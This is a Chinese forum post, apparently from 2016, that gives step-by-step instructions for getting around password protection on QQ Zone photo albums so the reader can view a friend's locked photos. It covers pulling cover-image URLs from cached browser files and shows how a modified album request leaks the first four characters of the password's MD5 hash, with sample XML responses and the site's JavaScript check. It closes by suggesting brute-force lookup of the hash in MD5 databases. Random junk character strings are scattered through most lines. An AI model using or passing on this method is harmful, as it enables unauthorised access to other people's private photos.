|
|
现在很多人都拥有QQ空间,并且上传了自己的照片。当你想看看新朋友的庐山真面目,可惜给相册加了密码。是不是很扫兴,现在就教你破解掉这个密码来观看加密相册。% ?0 E! J% |- [+ w8 [. g& A
0 B7 F5 N$ O+ O5 N
首先打开一个已经加过密的QQ空间相册页面,然后打开IE“工具-internet-选项”,在“常规”中的“internet临时文件夹”下,依次选择删除“cookies”和“删除文件”删除临时文件夹中所有的cookies和文件,然后再点击“设置”,在“设置窗口”选择“查看文件”,这样就打开了IE临时文件夹。
5 c8 I4 u, g/ F! b' e8 F" c
3 H9 l; L8 k6 ]; a' L: ^然后打开需要破解的加密相册,出现一个对话框需要输入密码,这是选择取消,在刷新一下空间,点击“相册”。作完上面的动作后找到临时文件夹,刷新一下,里面会有一个“cgi_qqzone_static”的XML文档。双击打开它,在弹出的对话框中选择“是”,打开的是一个代码文件。按Ctrl+f查找,输入“我”进行查找,找到<![CDATA[ 我 ]]>这段代码,下面那个地址就是QQ相册的封面地址。复制他就能看到加密图片的封面 J1 m4 D3 Q; J- J0 a
根据http://izone.qq.com/client/photo ... &album=31931732
; A$ e) E1 E+ s, w% D. w1 v, J下载或者翻看Internet临时文件夹下的 photo_password 文件可查到下列语句: # s- P, V; W2 O# m9 Z L5 c
type="text/JavaScript" src=https://www.abc369.net/info/way/"/js/md5.js"></script> + e8 q, y, W, J+ y" v( _
document.cookie=("album"+albumId+"pwd="+hex_md5(pwd));
; Q2 ?- ]2 p j* C6 `, {3 I. I* @1 D对比 md5.js文件可知,此v2.1版本的 JavaScript MD5,且输入的密码转化为32位的字符串。
5 Z& u: j" B) _0 I4 _1 _. Q# [ X& q7 e' C
比较两个地址:
+ E6 R) x( n; B/ U- s. ohttp://photo.qq.com/cgi-bin/izon ... mp;albumid=31931732 ; G9 Z: [- Q; Q. k
/*http://izone.qq.com/client/photo ... amp;album=31931732/这个地址类似可以不看*/ : ^3 a K1 |! q5 I6 r1 x1 }
(此地址为有密码情况下的登陆地址,要求输入密码)
4 o \' i8 j( d9 w) B1 Ghttp://photo.qq.com/cgi-bin/izon ... asswd=&mode=big 5 K* R8 B Y' z& Z, S- H6 w
(此地址为无密码情况下的登陆地址)
# m ~4 R! l! E1 i. _' V6 h& p8 ~! m
由此可以推断出: / G7 Q/ t" U4 R3 c! Z
http://photo.qq.com/cgi-bin/izon ... 1931732&passwd=(广告广告广告广告广告*)&mode=big
6 O2 ]" }+ F6 y/ I$ Z J广告广告为转化后的md5字符串,此地址应该为此地址为有密码情况下的直接登陆地址。 7 Y$ x B% v+ W, ~% s4 ^1 o
随便输入一段字符显示如下:
& o8 Z( G5 w$ u& s<?xml version="1.0" encoding="GBK" ?>
- G/ G1 }3 i( H5 C) r7 T0 i ]<error>密码有误,请重新输入!</error>
- z7 @/ N: {- E) n( `. M3 a3 R考虑到在前面有密码情况下的登陆窗口连接为cgi_album_pwd,浏览相册连接为cgi_album_view。 5 N5 J4 C. G, ]. ]/ J8 _
试将登陆地址改为下列方式:
0 O+ H$ [! `9 j/ t$ R2 Ohttp://photo.qq.com/cgi-bin/izon ... 1931732&passwd=(广告广告广告广告广告*)&mode=big - f3 L" P' f: e q+ E e- Y3 y$ E
随便输入一段字符显示如下: + A' T3 V: n0 m1 ^
<?xml version="1.0" encoding="GBK" ?> ! S8 Z0 S7 i5 I6 r! Y8 B
<data id="31931732" owner="23266229" passwd="81dc" />
: t7 c( ?0 v3 X, E6 v* v$ g# ?经过换算可知,1234的MD5值是81dc9bdb52d04dc20036dbd8313ed055 5 o" I8 h) L( I
测试数次
7 ^5 ?, s$ c, B* G& r<?xml version="1.0" encoding="GBK" ?>
+ j9 c% n" S ~! z @<data id="31931732" owner="23266229" passwd="1bbd" /> 6 i0 ?6 u: R Z1 s& x" [
密码:11111111 MD5:1bbd886460827015e5d605ed44252251
1 e/ H3 s r# I" R<?xml version="1.0" encoding="GBK" ?> & u) t5 P; m! H" P+ ^( N
<data id="31931732" owner="23266229" passwd="eccb" />
S0 I( D! ^8 I' @密码:3 MD5:eccbc87e4b5ce2fe28308fd9f2a7baf3
2 _4 |9 i9 a0 ^+ n, Q& i0 I* k3 y由此可以判断,此处的passwd为密码加密后的前4位。 " ]+ ]7 h6 y2 M( Q
photo_password 文件可查到下列语句:
$ y* U' Q4 M: o6 d8 Xvar p="";
T, c! s1 o6 ?7 B6 C0 S5 A7 ~if (x!=null) p=x.selectSingleNode("/data").getAttribute("passwd");
' C! [9 `6 r! G' B, s5 `$ t1 h0 P7 d判断此passwd应该是数据库中的某字段名。
0 u. e8 D0 V& W4 e/ T9 uif (p!="" && hex_md5(pwd).indexOf(p)!=0){
2 z! R3 f8 q* b/ ralert("密码错误")
2 S; b7 \0 d6 A' l/ r# udocument.getElementById("pass").focus(); - U3 w4 `2 K' k8 s0 y9 ~ @. ^, W
return; " s) d) _5 Q0 A3 d
} & X7 _/ d& l e; H2 `! |8 |: h
document.cookie=("album"+albumId+"pwd="+hex_md5(pwd));
# g. k) F$ o& X5 W( J' }8 e6 h2 ?' Tlocation="/client/photo_static_big.htm?uin="+uin+"&album="+albumId; ; Q' K9 v/ E- [3 I
pwd为输入的密码,经过md5加密。判断此处出现的passwd="eccb"应该是验证输入的密文密码的正确性的。如果正确,使用hex_md5(pwd)进行登陆。
1 [% U# O; A) E3 z6 l( j, c
) C; l2 c$ ?& f4 g4 K+ Z由于qq相册密码提示为8位,那么如果有心人使用相关工具换算处8位以下的所有数字和字母组合的MD5值做成数据库,那么密码就如同虚设。但是考虑到相册密码意义不大,一般情况下不会有人过于无聊拿机器去跑这东西... 似乎最基本常见的的运算次数为几百万亿次,如果谁又兴趣搞几台服务器跑天把做个数据库倒是蛮好,就是大了点准备个TB级的硬盘矩阵吧。如果怕麻烦可以去国外的几个大型MD5数据库查询
8 a& Z, G; W# g( x* D b8 B! r% G0 _7 E |
|
|手机版|小黑屋|☆我要吧☆
( 豫ICP备13016831号-1 )
狗仔卡
发表于 2016-4-6 22:05:08
提升卡
置顶卡
锁贴卡
解贴卡
变色卡
显身卡